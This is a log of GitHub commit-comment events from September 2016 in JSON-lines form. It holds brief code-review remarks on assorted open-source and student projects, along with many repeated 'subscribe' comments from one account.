{"id":"4641037018","type":"CommitCommentEvent","actor":{"login":"fernandosouza"},"repo":{"name":"simpleanduseful/clockin"},"payload":{"comment":{"id":19235277,"position":4,"line":13,"path":"src/main/webapp/content/css/clockin.css","commit_id":"cd2734869248459524a219e2f2f9e5191cdafbd9","created_at":"2016-09-30T02:00:07Z","updated_at":"2016-09-30T02:00:07Z","body":"I'm happy to see that you are creating modular code as many as possible. It would be better if there is a way to store this data in variables to allow you to use the color not in text-color only, but to any color properties.\r\n\r\n👍 Good job! 😃 "}},"created_at":"2016-09-30T02:00:07Z"}
{"id":"4641039816","type":"CommitCommentEvent","actor":{"login":"mgold"},"repo":{"name":"elm-lang/core"},"payload":{"comment":{"id":19235288,"position":null,"line":null,"path":null,"commit_id":"9d941d2597fcef5df9a42dcc598b969e9c6d4169","created_at":"2016-09-30T02:01:01Z","updated_at":"2016-09-30T02:01:01Z","body":"Oh my god yes. You have no idea how many times I wrote `rightShift` instead of `shiftRight` when writing Random.Pcg."}},"created_at":"2016-09-30T02:01:01Z"}
{"id":"4641040230","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235290,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T02:01:10Z","updated_at":"2016-09-30T02:01:10Z","body":"subscribe 213"}},"created_at":"2016-09-30T02:01:10Z"}
{"id":"4641041691","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235293,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T02:01:42Z","updated_at":"2016-09-30T02:01:42Z","body":"subscribe 214"}},"created_at":"2016-09-30T02:01:42Z"}
{"id":"4641043077","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235295,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T02:02:15Z","updated_at":"2016-09-30T02:02:15Z","body":"subscribe 215"}},"created_at":"2016-09-30T02:02:15Z"}
{"id":"4641044343","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235301,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T02:02:44Z","updated_at":"2016-09-30T02:02:44Z","body":"subscribe 216"}},"created_at":"2016-09-30T02:02:44Z"}
{"id":"4641044924","type":"CommitCommentEvent","actor":{"login":"MirkoTV"},"repo":{"name":"ziur/efeeder"},"payload":{"comment":{"id":19235305,"position":7,"line":17,"path":"src/main/webapp/assets/js/foodMeetings.js","commit_id":"103331cd5a4b6b2ba7536f33ac5f5f528fcaacc8","created_at":"2016-09-30T02:02:57Z","updated_at":"2016-09-30T02:02:57Z","body":"Is this alert actually needed?"}},"created_at":"2016-09-30T02:02:57Z"}
{"id":"4641046138","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235307,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T02:03:22Z","updated_at":"2016-09-30T02:03:22Z","body":"subscribe 217"}},"created_at":"2016-09-30T02:03:22Z"}
{"id":"4641047225","type":"CommitCommentEvent","actor":{"login":"greatelv"},"repo":{"name":"greatelv/canon"},"payload":{"comment":{"id":19235308,"position":4,"line":41,"path":"fe/FE_CORDOVA/www/index.html","commit_id":"2bfa266459ff296b70f56fcbf59a64004e39d335","created_at":"2016-09-30T02:03:44Z","updated_at":"2016-09-30T02:03:44Z","body":"라이브러리 경로를 www/js 밑에 놓읍시다."}},"created_at":"2016-09-30T02:03:44Z"}
{"id":"4641047630","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235310,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T02:03:54Z","updated_at":"2016-09-30T02:03:54Z","body":"subscribe 218"}},"created_at":"2016-09-30T02:03:54Z"}
{"id":"4641049435","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235313,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T02:04:34Z","updated_at":"2016-09-30T02:04:34Z","body":"subscribe 219"}},"created_at":"2016-09-30T02:04:34Z"}
{"id":"4641049551","type":"CommitCommentEvent","actor":{"login":"nihgwu"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19235314,"position":null,"line":null,"path":null,"commit_id":"0f242a13008f8a8b87b78304930206de0c653b6f","created_at":"2016-09-30T02:04:35Z","updated_at":"2016-09-30T02:04:35Z","body":"@grabbou `Implement ScrollView sticky headers on Android` was reverted, so this should not be listed in the release note of 0.35rc0"}},"created_at":"2016-09-30T02:04:35Z"}
{"id":"4641049731","type":"CommitCommentEvent","actor":{"login":"LuminousIT"},"repo":{"name":"LuminousIT/Cola-Wars-"},"payload":{"comment":{"id":19235316,"position":null,"line":null,"path":null,"commit_id":"81ea51a253ea1e823b7ca1b8b8562212233354c9","created_at":"2016-09-30T02:04:42Z","updated_at":"2016-09-30T02:04:42Z","body":"Hello Everyone, this is a simple app that monitors the Vote for a Cola or Pepsi and displays the Result.\r\nthe app installed successfully on my phone but it shuts down immediately i press the \"Vote for coca cola button\". Also, its not scrolling up/down. \r\n****\r\nplease help fix this..feel free to update the code and leave a comment. thanks everyone"}},"created_at":"2016-09-30T02:04:42Z"}
{"id":"4641050772","type":"CommitCommentEvent","actor":{"login":"degolaot"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19235317,"position":null,"line":null,"path":null,"commit_id":"4e776d430a4541c45f86744694967ca8c875d934","created_at":"2016-09-30T02:05:05Z","updated_at":"2016-09-30T02:05:05Z","body":"fixou o que ?ta mesma coisa"}},"created_at":"2016-09-30T02:05:05Z"}
{"id":"4641050862","type":"CommitCommentEvent","actor":{"login":"SalemTarek"},"repo":{"name":"SalemTarek/likeHTML-js"},"payload":{"comment":{"id":19235318,"position":1,"line":1,"path":"README.md","commit_id":"0a9bda1c7de3116e766a1fbdf80372a253ddcd1d","created_at":"2016-09-30T02:05:08Z","updated_at":"2016-09-30T02:05:08Z","body":"# likeHtML.js\r\n **it's use to Shortcut call up code of html in java script file to write you script faster**\r\n\r\nexample \r\nin the normal way you write \r\ndocument.querySelector('div');\r\nto call up div tag \r\nwith likeHTML you write \r\ndiv\r\nyes just write to you will be called up the div yes this is our way this is likeHTML way"}},"created_at":"2016-09-30T02:05:08Z"}
{"id":"4641050954","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235319,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T02:05:10Z","updated_at":"2016-09-30T02:05:10Z","body":"subscribe 220"}},"created_at":"2016-09-30T02:05:10Z"}
{"id":"4641051679","type":"CommitCommentEvent","actor":{"login":"MirkoTV"},"repo":{"name":"ziur/efeeder"},"payload":{"comment":{"id":19235320,"position":7,"line":17,"path":"src/main/webapp/assets/js/foodMeetings.js","commit_id":"103331cd5a4b6b2ba7536f33ac5f5f528fcaacc8","created_at":"2016-09-30T02:05:26Z","updated_at":"2016-09-30T02:05:26Z","body":"Good to have this alert until we have others team members code, just let's remember to remove it later"}},"created_at":"2016-09-30T02:05:26Z"}
{"id":"4641052287","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235322,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T02:05:40Z","updated_at":"2016-09-30T02:05:40Z","body":"subscribe 221"}},"created_at":"2016-09-30T02:05:40Z"}
{"id":"4641053697","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235327,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T02:06:15Z","updated_at":"2016-09-30T02:06:15Z","body":"subscribe 222"}},"created_at":"2016-09-30T02:06:15Z"}
{"id":"4641055105","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235333,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T02:06:48Z","updated_at":"2016-09-30T02:06:48Z","body":"subscribe 223"}},"created_at":"2016-09-30T02:06:48Z"}
{"id":"4641056352","type":"CommitCommentEvent","actor":{"login":"djKooks"},"repo":{"name":"jorgegil96/All-NBA"},"payload":{"comment":{"id":19235334,"position":null,"line":null,"path":null,"commit_id":"2a968bb65b52d1ffe92df9e2848d99974ef4d566","created_at":"2016-09-30T02:07:18Z","updated_at":"2016-09-30T02:07:18Z","body":"Some files seems to be renamed. Some of are `splah`"}},"created_at":"2016-09-30T02:07:18Z"}
{"id":"4641056376","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235335,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T02:07:19Z","updated_at":"2016-09-30T02:07:19Z","body":"subscribe 224"}},"created_at":"2016-09-30T02:07:19Z"}
{"id":"4641057025","type":"CommitCommentEvent","actor":{"login":"tdang2"},"repo":{"name":"robindang/tdpharma-client"},"payload":{"comment":{"id":19235338,"position":null,"line":null,"path":null,"commit_id":"adb3291051f9e5e91e5edd703566e3004efe856f","created_at":"2016-09-30T02:07:36Z","updated_at":"2016-09-30T02:07:36Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [A manager can identify medicines that has no sale price](https://trello.com/c/dyHFnCpB/57-a-manager-can-identify-medicines-that-has-no-sale-price)"}},"created_at":"2016-09-30T02:07:36Z"}
{"id":"4641057562","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235340,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T02:07:50Z","updated_at":"2016-09-30T02:07:50Z","body":"subscribe 225"}},"created_at":"2016-09-30T02:07:50Z"}
{"id":"4641058249","type":"CommitCommentEvent","actor":{"login":"tdang2"},"repo":{"name":"robindang/tdpharma-client"},"payload":{"comment":{"id":19235343,"position":null,"line":null,"path":null,"commit_id":"adb3291051f9e5e91e5edd703566e3004efe856f","created_at":"2016-09-30T02:08:07Z","updated_at":"2016-09-30T02:08:07Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [A manager can identify medicines that are low on inventory or out of stock](https://trello.com/c/ESafXxvp/58-a-manager-can-identify-medicines-that-are-low-on-inventory-or-out-of-stock)"}},"created_at":"2016-09-30T02:08:07Z"}
{"id":"4641058882","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235346,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T02:08:22Z","updated_at":"2016-09-30T02:08:22Z","body":"subscribe 226"}},"created_at":"2016-09-30T02:08:22Z"}
{"id":"4641059295","type":"CommitCommentEvent","actor":{"login":"stefanijo"},"repo":{"name":"FreeCodeCamp/2016-new-coder-survey"},"payload":{"comment":{"id":19235351,"position":7,"line":11,"path":"README.md","commit_id":"4c903b026ec752fd50a4d3b83826f0d47dbf6de2","created_at":"2016-09-30T02:08:31Z","updated_at":"2016-09-30T02:08:31Z","body":"I'm very interested "}},"created_at":"2016-09-30T02:08:31Z"}
{"id":"4641060252","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235354,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T02:08:56Z","updated_at":"2016-09-30T02:08:56Z","body":"subscribe 227"}},"created_at":"2016-09-30T02:08:56Z"}
{"id":"4641060360","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19235355,"position":null,"line":null,"path":null,"commit_id":"4b7198af809c4cfcfa40b32db781e57d6a4d0864","created_at":"2016-09-30T02:08:59Z","updated_at":"2016-09-30T02:08:59Z","body":"Related to: backdrop/backdrop-issues#2225 "}},"created_at":"2016-09-30T02:08:59Z"}
{"id":"4641060834","type":"CommitCommentEvent","actor":{"login":"degolaot"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19235356,"position":null,"line":null,"path":null,"commit_id":"584b46963da32276eee5ffbdeedd679488bc48ba","created_at":"2016-09-30T02:09:12Z","updated_at":"2016-09-30T02:09:12Z","body":"Zulazza the Corruptor usa o sistema de recompensa também.."}},"created_at":"2016-09-30T02:09:12Z"}
{"id":"4641061444","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235357,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T02:09:28Z","updated_at":"2016-09-30T02:09:28Z","body":"subscribe 228"}},"created_at":"2016-09-30T02:09:28Z"}
{"id":"4641062701","type":"CommitCommentEvent","actor":{"login":"Jawshy"},"repo":{"name":"Distraught-Gaming/Altis-Life"},"payload":{"comment":{"id":19235359,"position":null,"line":null,"path":null,"commit_id":"c286a08c886c928e7cc6ee883db02a8aee3412ce","created_at":"2016-09-30T02:09:59Z","updated_at":"2016-09-30T02:09:59Z","body":"[Altis_Life.Altis/Config_Master.hpp, line 10](https://github.com/Distraught-Gaming/Altis-Life/blob/389a4742b8ee28bdaa8db9593487e99be38c6b0a/Altis_Life.Altis/Config_Master.hpp#L10) \r\n"}},"created_at":"2016-09-30T02:09:59Z"}
{"id":"4641062718","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235360,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T02:09:59Z","updated_at":"2016-09-30T02:09:59Z","body":"subscribe 229"}},"created_at":"2016-09-30T02:09:59Z"}
{"id":"4641064080","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235364,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T02:10:32Z","updated_at":"2016-09-30T02:10:32Z","body":"subscribe 230"}},"created_at":"2016-09-30T02:10:32Z"}
{"id":"4641065447","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235365,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T02:11:03Z","updated_at":"2016-09-30T02:11:03Z","body":"subscribe 231"}},"created_at":"2016-09-30T02:11:03Z"}
{"id":"4641067174","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235369,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T02:11:45Z","updated_at":"2016-09-30T02:11:45Z","body":"subscribe 232"}},"created_at":"2016-09-30T02:11:45Z"}
{"id":"4641067265","type":"CommitCommentEvent","actor":{"login":"MrCoderMSH"},"repo":{"name":"wells1013/JZNavigationExtension"},"payload":{"comment":{"id":19235370,"position":null,"line":null,"path":null,"commit_id":"ed2589355f6a703e7ae8a703bd0b389ab92a5fd4","created_at":"2016-09-30T02:11:47Z","updated_at":"2016-09-30T02:11:47Z","body":"貌似还是没解决快速切换导航条显示的问题"}},"created_at":"2016-09-30T02:11:47Z"}
{"id":"4641067388","type":"CommitCommentEvent","actor":{"login":"nhantruong"},"repo":{"name":"nhantruong/House-Visualiser"},"payload":{"comment":{"id":19235371,"position":null,"line":null,"path":null,"commit_id":"a2f6e2ec37441ec24a42505d47a22f66949a8c38","created_at":"2016-09-30T02:11:50Z","updated_at":"2016-09-30T02:11:50Z","body":"1. Add file to Repository"}},"created_at":"2016-09-30T02:11:50Z"}
{"id":"4641068579","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235374,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T02:12:16Z","updated_at":"2016-09-30T02:12:16Z","body":"subscribe 233"}},"created_at":"2016-09-30T02:12:16Z"}
{"id":"4641069405","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/electron"},"payload":{"comment":{"id":19235377,"position":null,"line":null,"path":null,"commit_id":"b18c642766f51a3dbbe2bf00d35fb7616ba5d205","created_at":"2016-09-30T02:12:37Z","updated_at":"2016-09-30T02:12:37Z","body":"++"}},"created_at":"2016-09-30T02:12:37Z"}
{"id":"4641070297","type":"CommitCommentEvent","actor":{"login":"nday2"},"repo":{"name":"nday2/super-potato"},"payload":{"comment":{"id":19235381,"position":null,"line":null,"path":null,"commit_id":"d549fdc416a48eab467920ab79accdd3e5e341f6","created_at":"2016-09-30T02:12:56Z","updated_at":"2016-09-30T02:12:56Z","body":"subscribe 234"}},"created_at":"2016-09-30T02:12:56Z"}
{"id":"4641071391","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19235382,"position":null,"line":null,"path":null,"commit_id":"6fc6868db43e1ad7ab7269c88f34754a92a5c387","created_at":"2016-09-30T02:13:20Z","updated_at":"2016-09-30T02:13:20Z","body":"Related to: backdrop/backdrop-issues#2224 "}},"created_at":"2016-09-30T02:13:20Z"}
{"id":"4641074538","type":"CommitCommentEvent","actor":{"login":"huayi"},"repo":{"name":"junjun1092/beego-blog"},"payload":{"comment":{"id":19235387,"position":null,"line":null,"path":null,"commit_id":"1b60c0b7ae65cc29093dd5d6525269f4989623c8","created_at":"2016-09-30T02:14:31Z","updated_at":"2016-09-30T02:14:31Z","body":"能够认真的写记录是一件好事,  可是这个项目的名字叫beego-blog, 而你的提交内容却是工作中的问题,  有点偏离主题, 你看看你能想个什么办法来解决这个问题吗"}},"created_at":"2016-09-30T02:14:31Z"}
{"id":"4641075003","type":"CommitCommentEvent","actor":{"login":"ucchyocean"},"repo":{"name":"Scarsz/DiscordSRV"},"payload":{"comment":{"id":19235391,"position":null,"line":null,"path":null,"commit_id":"20673bdcbae2040f662a110d9f8ea0253948e0dc","created_at":"2016-09-30T02:14:41Z","updated_at":"2016-09-30T02:14:41Z","body":":+1: "}},"created_at":"2016-09-30T02:14:41Z"}
{"id":"4641075618","type":"CommitCommentEvent","actor":{"login":"DailyShana"},"repo":{"name":"Fluorohydride/ygopro-core"},"payload":{"comment":{"id":19235395,"position":null,"line":null,"path":null,"commit_id":"8ec6d24f45f9bf7759ab7526c7458f645def8323","created_at":"2016-09-30T02:14:55Z","updated_at":"2016-09-30T02:14:55Z","body":"用back()更简单一些，因为并不需要做迭代，只是去修改最后一个元素"}},"created_at":"2016-09-30T02:14:55Z"}
{"id":"4641080011","type":"CommitCommentEvent","actor":{"login":"wolfgangkarall"},"repo":{"name":"whyscream/postfix-grok-patterns"},"payload":{"comment":{"id":19235405,"position":null,"line":null,"path":null,"commit_id":"9ad44afd01b6ceac67b25b8ad7071a32dcca6e27","created_at":"2016-09-30T02:16:40Z","updated_at":"2016-09-30T02:16:40Z","body":"Yeah, those are better anyway. :)"}},"created_at":"2016-09-30T02:16:40Z"}
{"id":"4641081275","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19235408,"position":null,"line":null,"path":null,"commit_id":"688f33d73a7fb52c7eac04f15324c3ff355cd958","created_at":"2016-09-30T02:17:10Z","updated_at":"2016-09-30T02:17:10Z","body":"Related to: backdrop/backdrop-issues#2232 "}},"created_at":"2016-09-30T02:17:10Z"}
{"id":"4641091954","type":"CommitCommentEvent","actor":{"login":"hjneyra"},"repo":{"name":"Froznar/IS2-Gesti-n-de-Inventarios-final"},"payload":{"comment":{"id":19235423,"position":null,"line":null,"path":null,"commit_id":"fe576113a14d01ce3a1642e2e35a22765baa46c3","created_at":"2016-09-30T02:21:21Z","updated_at":"2016-09-30T02:21:21Z","body":"El 99.97% de archivos modificados de este commit son archivos temporales (@Froznar hice un comentario parecido en un pull request sobre como ignorar archivos temporales, cc @Rodarc20 @paulacamargo25 @Rapange @vanesantillana @nashvent @Danielafe7GitHub ). Dichos archivos no deben versionarse, dificultan la revision de los aportes que incluyen en el commit."}},"created_at":"2016-09-30T02:21:21Z"}
{"id":"4641092190","type":"CommitCommentEvent","actor":{"login":"yaosleep"},"repo":{"name":"yaosleep/coco"},"payload":{"comment":{"id":19235424,"position":1,"line":1,"path":"index.html","commit_id":"129d8a40cdcd292cd46abd8841ff7c671535eead","created_at":"2016-09-30T02:21:27Z","updated_at":"2016-09-30T02:21:27Z","body":"ss\r\n"}},"created_at":"2016-09-30T02:21:27Z"}
{"id":"4641093083","type":"CommitCommentEvent","actor":{"login":"Asanche"},"repo":{"name":"DrDrei/CMPUT301F16T02"},"payload":{"comment":{"id":19235429,"position":null,"line":null,"path":null,"commit_id":"f5d5d73164afc2a80ce86abc47dfd531cbd7a93c","created_at":"2016-09-30T02:21:50Z","updated_at":"2016-09-30T02:21:50Z","body":"Oh boy, what a good text file, I'm so excited!"}},"created_at":"2016-09-30T02:21:50Z"}
{"id":"4641094679","type":"CommitCommentEvent","actor":{"login":"flavour"},"repo":{"name":"sahana/SAMBRO"},"payload":{"comment":{"id":19235434,"position":5,"line":3235,"path":"modules/s3db/cap.py","commit_id":"ef7383f2446e3a1d57554df1cd58115c97968352","created_at":"2016-09-30T02:22:29Z","updated_at":"2016-09-30T02:22:29Z","body":"If I was a translator, it would be a little more helpful to see:\r\nT(\"Bulletin (%(language)s)\") % dict(language=...)"}},"created_at":"2016-09-30T02:22:29Z"}
{"id":"4641098483","type":"CommitCommentEvent","actor":{"login":"superkhau"},"repo":{"name":"strongloop/loopback-datasource-juggler"},"payload":{"comment":{"id":19235447,"position":null,"line":null,"path":null,"commit_id":"9a1ef0849575a124f963ceb2043916b0b89fbf40","created_at":"2016-09-30T02:23:58Z","updated_at":"2016-09-30T02:23:58Z","body":"@crandmck Did you run `npm test` before merging? Linter is failing with trailing spaces FYI. Next time, ping me or @Amir-61 For review before merging to master."}},"created_at":"2016-09-30T02:23:58Z"}
{"id":"4641106589","type":"CommitCommentEvent","actor":{"login":"rwest"},"repo":{"name":"CHME5137/github-assignment"},"payload":{"comment":{"id":19235461,"position":null,"line":null,"path":null,"commit_id":"2631ce792cf6c4a1b0361aa71a333714e1c95888","created_at":"2016-09-30T02:27:11Z","updated_at":"2016-09-30T02:27:11Z","body":"OK, but don't forget to update your github profile!  (step 2 of the assignment described on blackboard)"}},"created_at":"2016-09-30T02:27:11Z"}
{"id":"4641108023","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19235473,"position":18,"line":18,"path":"src/modulo-01-java-OO/modulo-01/Inventario.java","commit_id":"8faa52deab34a405baf05f19dbce38168acb5b99","created_at":"2016-09-30T02:27:43Z","updated_at":"2016-09-30T02:27:43Z","body":"Esse código não é legal para o BlueJ. O tipo da variável que foi declarado lá na linha 4 é `ArrayList<Item>`.. logo.. qual o tipo de retorno deste método?"}},"created_at":"2016-09-30T02:27:43Z"}
{"id":"4641110044","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19235479,"position":8,"line":8,"path":"src/modulo-01-java-OO/modulo-01/InventarioTest.java","commit_id":"8faa52deab34a405baf05f19dbce38168acb5b99","created_at":"2016-09-30T02:28:30Z","updated_at":"2016-09-30T02:28:30Z","body":"adicionar mais cenários de teste!"}},"created_at":"2016-09-30T02:28:30Z"}
{"id":"4641112499","type":"CommitCommentEvent","actor":{"login":"superkhau"},"repo":{"name":"strongloop/loopback-datasource-juggler"},"payload":{"comment":{"id":19235484,"position":null,"line":null,"path":null,"commit_id":"9a1ef0849575a124f963ceb2043916b0b89fbf40","created_at":"2016-09-30T02:29:28Z","updated_at":"2016-09-30T02:29:28Z","body":"Fix at https://github.com/strongloop/loopback-datasource-juggler/pull/1123"}},"created_at":"2016-09-30T02:29:28Z"}
{"id":"4641116099","type":"CommitCommentEvent","actor":{"login":"dshanske"},"repo":{"name":"pfefferle/wordpress-webmention"},"payload":{"comment":{"id":19235496,"position":null,"line":null,"path":null,"commit_id":"ec114c6592f5ed3b9ce32ca9403c770d36c88bdf","created_at":"2016-09-30T02:30:51Z","updated_at":"2016-09-30T02:30:51Z","body":"There is a problem here I think you created. You turned $comment_post_ID into $comment_post_id. But later, this is compacted into the comment array, which needs comment_post_ID. As a result...https://chat.indieweb.org/2016-09-29/1475172040321000 \r\n\r\nhttps://developer.wordpress.org/reference/functions/wp_new_comment/"}},"created_at":"2016-09-30T02:30:51Z"}
{"id":"4641116222","type":"CommitCommentEvent","actor":{"login":"lammn"},"repo":{"name":"eccubevn/ec-cube"},"payload":{"comment":{"id":19235498,"position":null,"line":null,"path":null,"commit_id":"b3aa3dedb1c5c54e9c917726865dec20bc0679f0","created_at":"2016-09-30T02:30:54Z","updated_at":"2016-09-30T02:30:54Z","body":"Add unit test for this issue"}},"created_at":"2016-09-30T02:30:54Z"}
{"id":"4641116649","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19235499,"position":null,"line":null,"path":null,"commit_id":"baad5271a427628634c51e9ab1d1b43405d8353d","created_at":"2016-09-30T02:31:05Z","updated_at":"2016-09-30T02:31:05Z","body":"Why doesn't this command have a check for if someone is already blacklisted?  \r\n\r\nI understand that this is typically for offline users, but there is no reason why it can't check against ``Punishments.roomUserids.get(room.id);``...\r\n\r\nThis really should of also refactored ``Punishments#isRoomBanned``, if anything :|"}},"created_at":"2016-09-30T02:31:05Z"}
{"id":"4641119221","type":"CommitCommentEvent","actor":{"login":"superkhau"},"repo":{"name":"strongloop/loopback-datasource-juggler"},"payload":{"comment":{"id":19235506,"position":null,"line":null,"path":null,"commit_id":"9a1ef0849575a124f963ceb2043916b0b89fbf40","created_at":"2016-09-30T02:31:45Z","updated_at":"2016-09-30T02:31:45Z","body":"I think this needs to be backported too?"}},"created_at":"2016-09-30T02:31:45Z"}
{"id":"4641120505","type":"CommitCommentEvent","actor":{"login":"dsilvam"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19235509,"position":132,"line":277,"path":"src/com/dotmarketing/portlets/cmsmaintenance/ajax/IndexAjaxAction.java","commit_id":"106caa240571eb63b9dd3eb43662ff9392f144e7","created_at":"2016-09-30T02:32:10Z","updated_at":"2016-09-30T02:32:10Z","body":"We can use a multi-catch statement here since the action is the same for these four exceptions. (SnapshotRestoreException | InterruptedException | ExecutionException | ZipException e )"}},"created_at":"2016-09-30T02:32:10Z"}
{"id":"4641121869","type":"CommitCommentEvent","actor":{"login":"dsilvam"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19235511,"position":125,"line":270,"path":"src/com/dotmarketing/portlets/cmsmaintenance/ajax/IndexAjaxAction.java","commit_id":"106caa240571eb63b9dd3eb43662ff9392f144e7","created_at":"2016-09-30T02:32:26Z","updated_at":"2016-09-30T02:32:26Z","body":"This sounds like a 500 error instead of 400. Server error "}},"created_at":"2016-09-30T02:32:26Z"}
{"id":"4641122170","type":"CommitCommentEvent","actor":{"login":"rwest"},"repo":{"name":"CHME5137/github-assignment"},"payload":{"comment":{"id":19235513,"position":null,"line":null,"path":null,"commit_id":"fad675e8e734ecc553ea47feb3ab9fb5786b6ea1","created_at":"2016-09-30T02:32:30Z","updated_at":"2016-09-30T02:32:30Z","body":"Oops! 😉 "}},"created_at":"2016-09-30T02:32:30Z"}
{"id":"4641122625","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19235515,"position":22,"line":13,"path":"src/modulo-01-java-OO/modulo-01/Elfo.java","commit_id":"1c12038aeab0f0813b5ec715216c8d5312176f6d","created_at":"2016-09-30T02:32:38Z","updated_at":"2016-09-30T02:32:38Z","body":"O cliente não pediu isso."}},"created_at":"2016-09-30T02:32:38Z"}
{"id":"4641123976","type":"CommitCommentEvent","actor":{"login":"rwest"},"repo":{"name":"CHME5137/github-assignment"},"payload":{"comment":{"id":19235518,"position":null,"line":null,"path":null,"commit_id":"d0a5f4c595c02c6a9c16ce87321b66888b0b1fba","created_at":"2016-09-30T02:33:07Z","updated_at":"2016-09-30T02:33:07Z","body":"Well recovered. But don't forget to complete your github profile."}},"created_at":"2016-09-30T02:33:07Z"}
